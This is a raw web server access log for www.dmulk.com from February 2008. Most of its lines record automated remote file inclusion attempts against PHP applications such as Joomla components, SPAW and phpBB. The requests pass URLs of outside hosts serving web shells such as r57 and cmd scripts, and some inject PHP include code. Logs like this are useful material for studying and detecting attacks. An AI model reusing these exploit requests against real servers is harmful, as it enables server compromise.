66.45.242.50 - - [25/Feb/2008:05:54:45 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:55:54 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:55:54 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:55:55 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.131.90 - - [25/Feb/2008:05:56:04 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:05:56:25 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:06:00:43 -0800] "GET /logs/access_080117.log/tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:06:00:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:06:00:44 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [25/Feb/2008:06:00:52 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:06:01:42 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:06:01:43 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:06:02:19 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:06:02:26 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:02:45 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:02:45 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:02:45 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.46.55.234 - - [25/Feb/2008:06:02:45 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.1" 200 2297833 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:06:02:55 -0800] "GET /index.php?option=com_calendar&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:06:02:55 -0800] "GET /logs/index.php?option=com_calendar&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.27.112 - - [25/Feb/2008:06:03:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.248.95 - - [25/Feb/2008:06:03:26 -0800] "GET /logs/access_080121.log/!scanhttp://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [25/Feb/2008:06:04:28 -0800] "GET /!scanhttp://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.46.55.234 - - [25/Feb/2008:06:05:23 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.1" 200 1814141 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:06:06:01 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:06:06:01 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:06:06:39 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:06:07:11 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:08:20 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:06:08:47 -0800] "GET /logs/access_080117.log//tools/send_reminders.php?includedir=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:06:08:47 -0800] "GET //tools/send_reminders.php?includedir=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [25/Feb/2008:06:08:47 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.46.55.234 - - [25/Feb/2008:06:09:00 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.1" 200 875475 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
69.94.120.198 - - [25/Feb/2008:06:09:04 -0800] "GET /config.inc.php?path_escape=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:09:19 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:09:24 -0800] "GET /config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:06:09:24 -0800] "GET /logs/config.inc.php?path_escape=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:06:10:17 -0800] "GET /logs/access_080211.log//saveserver.php?thisdir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:06:10:17 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:06:10:18 -0800] "GET /logs//saveserver.php?thisdir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:10:30 -0800] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:10:33 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:10:39 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:06:11:25 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:06:11:25 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:11:51 -0800] "GET /logs//saveserver.php?thisdir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:11:52 -0800] "GET //saveserver.php?thisdir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:06:12:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:06:13:22 -0800] "GET /squirrelcart/popup_window.php?site_isp_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.170 - - [25/Feb/2008:06:14:16 -0800] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:06:16:06 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:16:27 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [25/Feb/2008:06:16:27 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
196.35.158.180 - - [25/Feb/2008:06:16:44 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.47.228 - - [25/Feb/2008:06:17:20 -0800] "GET //skin/zero_vote/error.php?dir=http://x.apescar.net/b.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.90.143 - - [25/Feb/2008:06:17:36 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.larevo.org/web/mc.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.223.16.102 - - [25/Feb/2008:06:17:39 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.234.68.78 - - [25/Feb/2008:06:17:53 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [25/Feb/2008:06:18:20 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://x.apescar.net/b.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.90.143 - - [25/Feb/2008:06:19:01 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.larevo.org/web/mc.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.90.143 - - [25/Feb/2008:06:19:01 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.larevo.org/web/mc.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
222.122.47.228 - - [25/Feb/2008:06:19:16 -0800] "GET //skin/zero_vote/error.php?dir=http://x.apescar.net/b.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:19:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:19:36 -0800] "GET //skin/zero_vote/error.php?dir=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
189.19.29.139 - - [25/Feb/2008:06:19:50 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.29.139 - - [25/Feb/2008:06:19:51 -0800] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:06:20:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:06:20:05 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:06:20:11 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.19.29.139 - - [25/Feb/2008:06:20:38 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/Feb/2008:06:21:09 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/Feb/2008:06:21:09 -0800] "GET /logs/config.inc.php?path_escape=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:06:21:20 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:06:21:30 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:06:21:31 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.46.247 - - [25/Feb/2008:06:22:00 -0800] "GET /logs/access.log//login.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.17.35.69 - - [25/Feb/2008:06:22:10 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.164.34 - - [25/Feb/2008:06:22:36 -0800] "GET /logs/access_080131.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [25/Feb/2008:06:22:36 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [25/Feb/2008:06:22:37 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.121.89 - - [25/Feb/2008:06:22:38 -0800] "GET /logs/access_080108.log/services.php?page=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.121.89 - - [25/Feb/2008:06:22:39 -0800] "GET /services.php?page=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.121.89 - - [25/Feb/2008:06:22:39 -0800] "GET /logs/services.php?page=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:06:22:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:06:23:11 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:23:25 -0800] "GET /logs/index2.php?path_escape=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:23:26 -0800] "GET /index2.php?path_escape=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:06:23:35 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:06:23:35 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Feb/2008:06:23:36 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:06:23:42 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:06:23:42 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [25/Feb/2008:06:23:42 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:06:24:22 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:06:24:22 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:06:24:23 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:06:24:44 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:24:57 -0800] "GET /logs/index2.php?image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:24:57 -0800] "GET /index2.php?image_upload.php?sbp=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:24:58 -0800] "GET /logs/index.php?GALLERY_BASEDIR=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
66.45.242.50 - - [25/Feb/2008:06:25:00 -0800] "GET /index.php?GALLERY_BASEDIR=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:25:05 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:25:05 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:25:46 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:06:25:46 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:06:26:27 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:27:47 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:27:54 -0800] "GET /config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:27:55 -0800] "GET /logs/config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:28:45 -0800] "GET /logs/access_080117.log//admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:28:45 -0800] "GET //admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:06:28:46 -0800] "GET /logs//admin/index.php?loadadminpage=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:06:28:48 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:06:28:49 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:06:28:50 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.64.77 - - [25/Feb/2008:06:28:55 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
